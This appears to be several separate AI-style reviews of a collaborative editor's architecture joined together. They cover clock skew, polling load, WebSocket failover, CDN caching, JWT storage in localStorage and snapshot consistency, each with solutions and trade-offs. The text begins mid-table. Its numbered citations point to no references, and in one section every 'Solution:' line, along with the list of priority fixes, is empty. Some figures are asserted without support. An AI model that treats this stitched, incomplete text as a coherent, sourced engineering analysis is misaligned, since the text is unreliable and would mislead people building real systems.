| Compressed snapshots in object store | Cuts storage cost, faster retrieval. | CPU for compression, need to manage lifecycle. |
| READ‑AFTER‑WRITE routing | Guarantees consistency for latest edits. | Primary DB load spikes, need tracking per‑doc. |
| Redis cluster | Horizontal scaling, fault‑tolerance. | Complexity of sharding keys, added network hops. |
| Auto‑scale based on WS connections | Handles traffic spikes automatically. | May over‑scale during brief bursts; need cost‑aware thresholds. |
| OpenTelemetry tracing | Pinpoints latency bottlenecks, aids debugging. | Overhead on every request; requires instrumentation on all services. |
| Audit‑log table | Compliance, forensic analysis. | Increased DB size, need retention policy. |
Implementing the above mitigations will eliminate the most critical failure modes, eliminate race conditions that currently cause lost edits, and provide a scalable foundation that can handle thousands of concurrent editors without hitting single‑point bottlenecks. The trade‑offs are intentional: you trade a little extra latency or operational complexity for far greater reliability, consistency, and security. Adjust the specific choices (e.g., stickiness vs. shared bus, CRDT vs. OT) based on your latency SLA, team expertise, and cost constraints.
Client Clock Skew in Conflict Resolution
Client-generated timestamps for last-write-wins can fail due to clock skew across devices, where one client's clock lags or leads, causing incorrect overwrite ordering even if changes were logically sequential.[21][27][32] This leads to lost edits nondeterministically.
Solution: Replace client timestamps with server-assigned monotonic counters or UUIDs from a central authority like PostgreSQL sequences.
Trade-offs: Adds server-side sequencing latency (1-5ms) but eliminates skew; requires all changes to route through DB first, increasing write load.[14]
Cross-Server Update Races
When multiple servers poll PostgreSQL every 2 seconds, they may detect the same change batch simultaneously, leading to duplicate broadcasts or missed sequencing in WebSocket clients.[6] Polling windows create TOCTOU (time-of-check-to-time-of-use) gaps.
Solution: Use PostgreSQL LISTEN/NOTIFY for push notifications on change rows instead of polling.
Trade-offs: Reduces DB load and latency (sub-second vs 2s) but couples servers to DB events; notify storms possible under high churn.[1]
WebSocket Connection Loss on Server Failure
Each server holds its own WebSockets; server crash drops all connected clients' sessions, forcing reconnects and potential data loss if Redis sessions aren't perfectly synced.[3][8][34] Load balancer round-robin lacks sticky sessions, exacerbating drops.
Solution: Implement sticky sessions via load balancer cookies or IP hashing, plus Redis pub/sub for cross-server broadcasting (e.g., Socket.IO Redis adapter).[23]
Trade-offs: Sticky improves reliability but risks uneven load/hotspots; pub/sub adds ~10-50ms latency and Redis dependency.[5]
PostgreSQL Write Overload
Every keystroke writes to PostgreSQL from the connected server, overwhelming the DB under concurrent edits (e.g., 100 users/doc at 5 changes/sec).[22][28][33] No write buffering leads to connection pool exhaustion.
Solution: Buffer changes in Redis (server-local queues), batch-write to PG every 100ms or 50 changes; use read replicas for non-critical queries.[3]
Trade-offs: Buffering risks minor data loss on crash (mitigate with AOF persistence) but cuts DB writes 80-90%; adds reconciliation logic.[22]
Stale CDN-Cached API Responses
CloudFront caches API responses 5 minutes, serving outdated document states or changes to clients, especially read-heavy ops like load/join.[25] Invalidation isn't automatic for DB writes.
Solution: Exclude dynamic APIs from CDN caching or use short TTL (10s) with Cache-Control: no-cache headers; invalidate on document writes via CloudFront invalidations.[30]
Trade-offs: No-cache boosts origin load 10x but ensures freshness; invalidations cost API calls and have quotas.[36]
JWT XSS Vulnerability
JWTs in localStorage are readable by XSS scripts, allowing token theft and full account takeover if frontend has any injection flaw.[24][29] 24h expiry doesn't prevent session hijack.
Solution: Store JWT in httpOnly cookies (backend-set), use short-lived access tokens (15min) refreshed via refresh tokens.
Trade-offs: Cookies enable CSRF (mitigate with tokens) but block XSS access; adds backend refresh endpoint load.[35]
Document Snapshot Inconsistency
30s HTML snapshots may capture mid-edit state during active collaboration, leading to corrupt restores or lost granularity on load/reconnect.[26][31] Full snapshots bloat storage without op logs.
Solution: Store incremental ops alongside snapshots (e.g., Yjs-style log), replay on load; snapshot every 5min during activity.[31]
Trade-offs: Ops add storage/query complexity (need GC) but enable history/undo; replay latency scales with churn (limit to 5min ops).[9]
Polling DB Load Explosion
N servers polling every 2s = N/2 queries/sec baseline, exploding to 100s/sec per doc with high activity; kills read replicas.[10]
Solution: Switch to Redis pub/sub for change notifications across servers, with PG as source-of-truth.
Trade-offs: Redis adds single-point failure (use cluster) but drops polls 100x, enabling 10k+ servers.[3]
Per-Server WebSocket Limits
Node.js handles ~5k-10k WS/server; beyond requires 100s of instances, straining Redis for sessions if stateful.[8][13]
Solution: Stateless WS with Redis/Kafka pub/sub; partition docs by org ID across servers.[3][18]
Trade-offs: Pub/sub network overhead (20-100ms) but true horizontal scale to millions; eventual consistency.[5]
DB Partitioning Gaps
Org ID partitioning helps but hot orgs (e.g., large teams) still overload single shards; no sharding mentioned.[39]
Solution: Add document ID hashing for sub-partitioning, with PG Citus for horizontal sharding.
Trade-offs: Citus adds 2x latency/join complexity but scales writes linearly; migration disruptive.[22]
Here's a detailed analysis of potential issues and solutions for the proposed architecture:
Failure Mode: Changes only broadcast to clients connected to the same server Impact: Users on different servers experience update delays (up to 2s) Solution:
Race Condition: Last-write-wins with unreliable client timestamps Impact: Malicious users could manipulate system clocks to force conflicts Solution:
Scaling Bottleneck: 2s polling interval creates sync delays Impact: Multi-server deployments have stale document views Solution:
Scaling Bottleneck: Single PostgreSQL primary for all writes Impact: Document saves queue under heavy load Solution:
Failure Mode: Full HTML snapshots every 30s Impact: Storage bloat and potential data loss window Solution:
Failure Mode: XSS vulnerabilities via localStorage Impact: Session hijacking possibilities Solution:
Race Condition: Cached API responses with live document data Impact: Users see outdated documents for up to 5 minutes Solution:
Scaling Bottleneck: OS limits on concurrent connections Impact: ~65k connection limit per server Solution:
Scaling Bottleneck: Organization-based partitioning Impact: Large organizations create uneven load Solution:
Race Condition: Lost updates with LWW strategy Impact: Valid changes get overwritten Solution:
Failure Mode: Single PostgreSQL primary Impact: Downtime during primary failure Solution:
Scaling Bottleneck: Full HTML diffing Impact: UI lag with large documents Solution:
| Component | Problem | Solution | Trade-off |
|---|---|---|---|
| Real-Time | Fragmented updates | Redis Pub/Sub | +3ms latency |
| Database | Write contention | Sharding | Complex queries |
| Auth | XSS risks | HttpOnly cookies | Longer TTFB |
| Sync | Data loss | CRDTs | Higher memory |
| Scaling | Connection limits | Dedicated WS servers | More infra |
Recommended Priority Fixes:
Each solution requires careful benchmarking - particularly the CRDT implementation which could increase memory usage by 300-500% for large documents but provides essential conflict-free collaboration capabilities.